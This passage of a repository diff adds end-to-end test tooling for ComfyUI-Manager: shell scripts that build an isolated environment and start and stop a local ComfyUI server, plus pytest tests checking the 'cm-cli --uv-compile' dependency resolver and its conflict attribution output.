# comfyui_manager.__init__ imports from comfy — both need PYTHONPATH
if ! PYTHONPATH="$root/comfyui" "$venv_py" -c "import comfy" 2>/dev/null; then
err "Verification FAIL: 'import comfy' failed"
((errors++))
fi
if ! PYTHONPATH="$root/comfyui" "$venv_py" -c "import comfyui_manager" 2>/dev/null; then
err "Verification FAIL: 'import comfyui_manager' failed"
((errors++))
fi
if [[ "$errors" -gt 0 ]]; then
die "Verification failed with $errors error(s)"
fi
log "Verification OK: all checks passed"
}
# ===== Main =====
# Resolve MANAGER_ROOT
if [[ -z "${MANAGER_ROOT:-}" ]]; then
MANAGER_ROOT="$(detect_manager_root)" || die "Cannot detect MANAGER_ROOT. Set it explicitly."
fi
MANAGER_ROOT="$(cd "$MANAGER_ROOT" && pwd)"
log "MANAGER_ROOT=$MANAGER_ROOT"
# Validate prerequisites
validate_prerequisites
PYTHON="${PYTHON:-python3}"
COMFYUI_BRANCH="${COMFYUI_BRANCH:-master}"
# Create or use E2E_ROOT
CREATED_BY_US=false
if [[ -z "${E2E_ROOT:-}" ]]; then
E2E_ROOT="$(mktemp -d -t e2e_comfyui_XXXXXX)"
CREATED_BY_US=true
log "Created E2E_ROOT=$E2E_ROOT"
else
mkdir -p "$E2E_ROOT"
log "Using E2E_ROOT=$E2E_ROOT"
fi
# Idempotency check
check_already_setup "$E2E_ROOT"
# Cleanup trap: remove E2E_ROOT on failure only if we created it
cleanup_on_failure() {
local exit_code=$?
if [[ "$exit_code" -ne 0 ]] && [[ "$CREATED_BY_US" == "true" ]]; then
err "Setup failed. Cleaning up $E2E_ROOT"
rm -rf "$E2E_ROOT"
fi
}
trap cleanup_on_failure EXIT
# Step 1: Clone ComfyUI
log "Step 1/8: Cloning ComfyUI (branch=$COMFYUI_BRANCH)..."
if [[ -d "$E2E_ROOT/comfyui/.git" ]]; then
log " ComfyUI already cloned, skipping"
else
git clone --depth=1 --branch "$COMFYUI_BRANCH" "$COMFYUI_REPO" "$E2E_ROOT/comfyui"
fi
# Step 2: Create virtual environment
log "Step 2/8: Creating virtual environment..."
if [[ -d "$E2E_ROOT/venv" ]]; then
log " venv already exists, skipping"
else
uv venv "$E2E_ROOT/venv"
fi
VENV_PY="$E2E_ROOT/venv/bin/python"
# Step 3: Install ComfyUI dependencies
log "Step 3/8: Installing ComfyUI dependencies (CPU-only)..."
uv pip install \
--python "$VENV_PY" \
-r "$E2E_ROOT/comfyui/requirements.txt" \
--extra-index-url "$PYTORCH_CPU_INDEX"
# Step 4: Install ComfyUI-Manager (non-editable, production-like)
log "Step 4/8: Installing ComfyUI-Manager..."
uv pip install --python "$VENV_PY" "$MANAGER_ROOT"
# Step 5: Create symlink for custom_nodes discovery
log "Step 5/8: Creating custom_nodes symlink..."
mkdir -p "$E2E_ROOT/comfyui/custom_nodes"
local_link="$E2E_ROOT/comfyui/custom_nodes/ComfyUI-Manager"
if [[ -L "$local_link" ]]; then
log " Symlink already exists, updating"
rm -f "$local_link"
fi
ln -s "$MANAGER_ROOT" "$local_link"
# Step 6: Write config.ini to correct path
log "Step 6/8: Writing config.ini..."
mkdir -p "$E2E_ROOT/comfyui/user/__manager"
echo "$CONFIG_INI_CONTENT" > "$E2E_ROOT/comfyui/user/__manager/config.ini"
# Step 7: Create HOME isolation directories
log "Step 7/8: Creating HOME isolation directories..."
mkdir -p "$E2E_ROOT/home/.config"
mkdir -p "$E2E_ROOT/home/.local/share"
mkdir -p "$E2E_ROOT/logs"
# Step 8: Verify setup
log "Step 8/8: Verifying setup..."
verify_setup "$E2E_ROOT" "$MANAGER_ROOT"
# Write marker file
date -Iseconds > "$E2E_ROOT/.e2e_setup_complete"
# Clear the EXIT trap since setup succeeded
trap - EXIT
log "Setup complete."
echo "E2E_ROOT=$E2E_ROOT"

View File

@ -0,0 +1,129 @@
#!/usr/bin/env bash
# start_comfyui.sh — Foreground-blocking ComfyUI launcher for E2E tests
#
# Starts ComfyUI in the background, then blocks the foreground until the server
# is ready (or timeout). This makes it safe to call from subprocess.run() or
# Claude's Bash tool — the call returns only when ComfyUI is accepting requests.
#
# Input env vars:
# E2E_ROOT — (required) path to E2E environment from setup_e2e_env.sh
# PORT — ComfyUI listen port (default: 8199)
# TIMEOUT — max seconds to wait for readiness (default: 120)
#
# Output (last line on success):
# COMFYUI_PID=<pid> PORT=<port>
#
# Exit: 0=ready, 1=timeout/failure
set -euo pipefail
# --- Defaults ---
PORT="${PORT:-8199}"
TIMEOUT="${TIMEOUT:-120}"
# --- Logging helpers ---
log() { echo "[start_comfyui] $*"; }
err() { echo "[start_comfyui] ERROR: $*" >&2; }
die() { err "$@"; exit 1; }
# --- Validate environment ---
[[ -n "${E2E_ROOT:-}" ]] || die "E2E_ROOT is not set"
[[ -d "$E2E_ROOT/comfyui" ]] || die "ComfyUI not found at $E2E_ROOT/comfyui"
[[ -x "$E2E_ROOT/venv/bin/python" ]] || die "venv python not found at $E2E_ROOT/venv/bin/python"
[[ -f "$E2E_ROOT/.e2e_setup_complete" ]] || die "Setup marker not found. Run setup_e2e_env.sh first."
PY="$E2E_ROOT/venv/bin/python"
COMFY_DIR="$E2E_ROOT/comfyui"
LOG_DIR="$E2E_ROOT/logs"
LOG_FILE="$LOG_DIR/comfyui.log"
PID_FILE="$LOG_DIR/comfyui.pid"
mkdir -p "$LOG_DIR"
# --- Check/clear port ---
if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
log "Port $PORT is in use. Attempting to stop existing process..."
# Try to read existing PID file
if [[ -f "$PID_FILE" ]]; then
OLD_PID="$(cat "$PID_FILE")"
if kill -0 "$OLD_PID" 2>/dev/null; then
kill "$OLD_PID" 2>/dev/null || true
sleep 2
fi
fi
# Fallback: kill by port pattern
if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
pkill -f "main\\.py.*--port $PORT" 2>/dev/null || true
sleep 2
fi
# Final check
if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
die "Port $PORT is still in use after cleanup attempt"
fi
log "Port $PORT cleared."
fi
# --- Start ComfyUI ---
log "Starting ComfyUI on port $PORT..."
# Create empty log file (ensures tail -f works from the start)
: > "$LOG_FILE"
# Launch with unbuffered Python output so log lines appear immediately
PYTHONUNBUFFERED=1 \
HOME="$E2E_ROOT/home" \
nohup "$PY" "$COMFY_DIR/main.py" \
--cpu \
--enable-manager \
--port "$PORT" \
> "$LOG_FILE" 2>&1 &
COMFYUI_PID=$!
echo "$COMFYUI_PID" > "$PID_FILE"
log "ComfyUI PID=$COMFYUI_PID, log=$LOG_FILE"
# Verify process didn't crash immediately
sleep 1
if ! kill -0 "$COMFYUI_PID" 2>/dev/null; then
err "ComfyUI process died immediately. Last 30 lines of log:"
tail -n 30 "$LOG_FILE" >&2
rm -f "$PID_FILE"
exit 1
fi
# --- Block until ready ---
# tail -n +1 -f: read from file start AND follow new content (no race condition)
# grep -q -m1: exit on first match → tail gets SIGPIPE → pipeline ends
# timeout: kill the pipeline after TIMEOUT seconds
log "Waiting up to ${TIMEOUT}s for ComfyUI to become ready..."
if timeout "$TIMEOUT" bash -c \
"tail -n +1 -f '$LOG_FILE' 2>/dev/null | grep -q -m1 'To see the GUI'"; then
log "ComfyUI startup message detected."
else
err "Timeout (${TIMEOUT}s) waiting for ComfyUI. Last 30 lines of log:"
tail -n 30 "$LOG_FILE" >&2
kill "$COMFYUI_PID" 2>/dev/null || true
rm -f "$PID_FILE"
exit 1
fi
# Verify process is still alive after readiness detected
if ! kill -0 "$COMFYUI_PID" 2>/dev/null; then
err "ComfyUI process died after readiness signal. Last 30 lines:"
tail -n 30 "$LOG_FILE" >&2
rm -f "$PID_FILE"
exit 1
fi
# Optional HTTP health check
if command -v curl >/dev/null 2>&1; then
if curl -sf "http://127.0.0.1:${PORT}/system_stats" >/dev/null 2>&1; then
log "HTTP health check passed (/system_stats)"
else
log "HTTP health check skipped (endpoint not yet available, but startup message detected)"
fi
fi
log "ComfyUI is ready."
echo "COMFYUI_PID=$COMFYUI_PID PORT=$PORT"

View File

@ -0,0 +1,75 @@
#!/usr/bin/env bash
# stop_comfyui.sh — Graceful ComfyUI shutdown for E2E tests
#
# Stops a ComfyUI process previously started by start_comfyui.sh.
# Uses SIGTERM first, then SIGKILL after a grace period.
#
# Input env vars:
# E2E_ROOT — (required) path to E2E environment
# PORT — ComfyUI port for fallback pkill (default: 8199)
#
# Exit: 0=stopped, 1=failed
set -euo pipefail
PORT="${PORT:-8199}"
GRACE_PERIOD=10
# --- Logging helpers ---
log() { echo "[stop_comfyui] $*"; }
err() { echo "[stop_comfyui] ERROR: $*" >&2; }
die() { err "$@"; exit 1; }
# --- Validate ---
[[ -n "${E2E_ROOT:-}" ]] || die "E2E_ROOT is not set"
PID_FILE="$E2E_ROOT/logs/comfyui.pid"
# --- Read PID ---
COMFYUI_PID=""
if [[ -f "$PID_FILE" ]]; then
COMFYUI_PID="$(cat "$PID_FILE")"
log "Read PID=$COMFYUI_PID from $PID_FILE"
fi
# --- Graceful shutdown via SIGTERM ---
if [[ -n "$COMFYUI_PID" ]] && kill -0 "$COMFYUI_PID" 2>/dev/null; then
log "Sending SIGTERM to PID $COMFYUI_PID..."
kill "$COMFYUI_PID" 2>/dev/null || true
# Wait for graceful shutdown
elapsed=0
while kill -0 "$COMFYUI_PID" 2>/dev/null && [[ "$elapsed" -lt "$GRACE_PERIOD" ]]; do
sleep 1
elapsed=$((elapsed + 1))
done
# Force kill if still alive
if kill -0 "$COMFYUI_PID" 2>/dev/null; then
log "Process still alive after ${GRACE_PERIOD}s. Sending SIGKILL..."
kill -9 "$COMFYUI_PID" 2>/dev/null || true
sleep 1
fi
fi
# --- Fallback: kill by port pattern ---
if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
log "Port $PORT still in use. Attempting pkill fallback..."
pkill -f "main\\.py.*--port $PORT" 2>/dev/null || true
sleep 2
if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
pkill -9 -f "main\\.py.*--port $PORT" 2>/dev/null || true
sleep 1
fi
fi
# --- Cleanup PID file ---
rm -f "$PID_FILE"
# --- Verify port is free ---
if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
die "Port $PORT is still in use after shutdown"
fi
log "ComfyUI stopped."

View File

@ -0,0 +1,254 @@
"""E2E tests for cm-cli --uv-compile across all supported commands.
Requires a pre-built E2E environment (from setup_e2e_env.sh).
Set E2E_ROOT env var to point at it, or the tests will be skipped.
Supply-chain safety policy:
To prevent supply-chain attacks, E2E tests MUST only install node packs
from verified, controllable authors (ltdrdata, comfyanonymous, etc.).
Currently this suite uses only ltdrdata's dedicated test packs
(nodepack-test1-do-not-install, nodepack-test2-do-not-install) which
are intentionally designed for conflict testing and contain no
executable code. Adding packs from unverified sources is prohibited.
Usage:
E2E_ROOT=/tmp/e2e_full_test pytest tests/e2e/test_e2e_uv_compile.py -v
"""
from __future__ import annotations
import os
import shutil
import subprocess
import pytest
E2E_ROOT = os.environ.get("E2E_ROOT", "")
COMFYUI_PATH = os.path.join(E2E_ROOT, "comfyui") if E2E_ROOT else ""
CM_CLI = os.path.join(E2E_ROOT, "venv", "bin", "cm-cli") if E2E_ROOT else ""
CUSTOM_NODES = os.path.join(COMFYUI_PATH, "custom_nodes") if COMFYUI_PATH else ""
REPO_TEST1 = "https://github.com/ltdrdata/nodepack-test1-do-not-install"
REPO_TEST2 = "https://github.com/ltdrdata/nodepack-test2-do-not-install"
PACK_TEST1 = "nodepack-test1-do-not-install"
PACK_TEST2 = "nodepack-test2-do-not-install"
pytestmark = pytest.mark.skipif(
not E2E_ROOT or not os.path.isfile(os.path.join(E2E_ROOT, ".e2e_setup_complete")),
reason="E2E_ROOT not set or E2E environment not ready (run setup_e2e_env.sh first)",
)
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _run_cm_cli(*args: str, timeout: int = 180) -> subprocess.CompletedProcess:
"""Run cm-cli in the E2E environment."""
env = {**os.environ, "COMFYUI_PATH": COMFYUI_PATH}
return subprocess.run(
[CM_CLI, *args],
capture_output=True,
text=True,
timeout=timeout,
env=env,
)
def _remove_pack(name: str) -> None:
"""Remove a node pack from custom_nodes (if it exists)."""
path = os.path.join(CUSTOM_NODES, name)
if os.path.islink(path):
os.unlink(path)
elif os.path.isdir(path):
shutil.rmtree(path, ignore_errors=True)
def _pack_exists(name: str) -> bool:
return os.path.isdir(os.path.join(CUSTOM_NODES, name))
# ---------------------------------------------------------------------------
# Fixtures
# ---------------------------------------------------------------------------
@pytest.fixture(autouse=True)
def _clean_test_packs():
"""Ensure test node packs are removed before and after each test."""
_remove_pack(PACK_TEST1)
_remove_pack(PACK_TEST2)
yield
_remove_pack(PACK_TEST1)
_remove_pack(PACK_TEST2)
# ---------------------------------------------------------------------------
# Tests
# ---------------------------------------------------------------------------
class TestInstall:
"""cm-cli install --uv-compile"""
def test_install_single_pack_resolves(self):
"""Install one test pack with --uv-compile → resolve succeeds."""
r = _run_cm_cli("install", "--uv-compile", REPO_TEST1)
combined = r.stdout + r.stderr
assert _pack_exists(PACK_TEST1)
assert "Installation was successful" in combined
assert "Resolved" in combined
def test_install_conflicting_packs_shows_attribution(self):
"""Install two conflicting packs → conflict attribution output."""
# Install first (no conflict yet)
r1 = _run_cm_cli("install", "--uv-compile", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
assert "Resolved" in r1.stdout + r1.stderr
# Install second → conflict
r2 = _run_cm_cli("install", "--uv-compile", REPO_TEST2)
combined = r2.stdout + r2.stderr
assert _pack_exists(PACK_TEST2)
assert "Installation was successful" in combined
assert "Resolution failed" in combined
assert "Conflicting packages (by node pack):" in combined
assert PACK_TEST1 in combined
assert PACK_TEST2 in combined
assert "ansible" in combined.lower()
class TestReinstall:
"""cm-cli reinstall --uv-compile"""
def test_reinstall_with_uv_compile(self):
"""Reinstall an existing pack with --uv-compile."""
# Install first
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
# Reinstall with --uv-compile
r = _run_cm_cli("reinstall", "--uv-compile", REPO_TEST1)
combined = r.stdout + r.stderr
# uv-compile should run (resolve output present)
assert "Resolving dependencies" in combined
class TestUpdate:
"""cm-cli update --uv-compile"""
def test_update_single_with_uv_compile(self):
"""Update an installed pack with --uv-compile."""
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
r = _run_cm_cli("update", "--uv-compile", REPO_TEST1)
combined = r.stdout + r.stderr
assert "Resolving dependencies" in combined
def test_update_all_with_uv_compile(self):
"""update all --uv-compile runs uv-compile after updating."""
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
r = _run_cm_cli("update", "--uv-compile", "all")
combined = r.stdout + r.stderr
assert "Resolving dependencies" in combined
class TestFix:
"""cm-cli fix --uv-compile"""
def test_fix_single_with_uv_compile(self):
"""Fix an installed pack with --uv-compile."""
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
r = _run_cm_cli("fix", "--uv-compile", REPO_TEST1)
combined = r.stdout + r.stderr
assert "Resolving dependencies" in combined
def test_fix_all_with_uv_compile(self):
"""fix all --uv-compile runs uv-compile after fixing."""
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
r = _run_cm_cli("fix", "--uv-compile", "all")
combined = r.stdout + r.stderr
assert "Resolving dependencies" in combined
class TestUvCompileStandalone:
"""cm-cli uv-compile (standalone command)"""
def test_uv_compile_no_packs(self):
"""uv-compile with no node packs → 'No custom node packs found'."""
r = _run_cm_cli("uv-compile")
combined = r.stdout + r.stderr
# Only ComfyUI-Manager exists (no requirements.txt in it normally)
# so either "No custom node packs found" or resolves 0
assert r.returncode == 0 or "No custom node packs" in combined
def test_uv_compile_with_packs(self):
"""uv-compile after installing test pack → resolves."""
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
r = _run_cm_cli("uv-compile")
combined = r.stdout + r.stderr
assert "Resolving dependencies" in combined
assert "Resolved" in combined
def test_uv_compile_conflict_attribution(self):
"""uv-compile with conflicting packs → shows attribution."""
_run_cm_cli("install", REPO_TEST1)
_run_cm_cli("install", REPO_TEST2)
r = _run_cm_cli("uv-compile")
combined = r.stdout + r.stderr
assert r.returncode != 0
assert "Conflicting packages (by node pack):" in combined
assert PACK_TEST1 in combined
assert PACK_TEST2 in combined
class TestRestoreDependencies:
"""cm-cli restore-dependencies --uv-compile"""
def test_restore_dependencies_with_uv_compile(self):
"""restore-dependencies --uv-compile runs resolver after restore."""
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
r = _run_cm_cli("restore-dependencies", "--uv-compile")
combined = r.stdout + r.stderr
assert "Resolving dependencies" in combined
class TestConflictAttributionDetail:
"""Verify conflict attribution output details."""
def test_both_packs_and_specs_shown(self):
"""Conflict output shows pack names AND version specs."""
_run_cm_cli("install", REPO_TEST1)
_run_cm_cli("install", REPO_TEST2)
r = _run_cm_cli("uv-compile")
combined = r.stdout + r.stderr
# Processed attribution must show exact version specs (not raw uv error)
assert "Conflicting packages (by node pack):" in combined
assert "ansible==9.13.0" in combined
assert "ansible-core==2.14.0" in combined
# Both pack names present in attribution block
assert PACK_TEST1 in combined
assert PACK_TEST2 in combined

File diff suppressed because it is too large Load Diff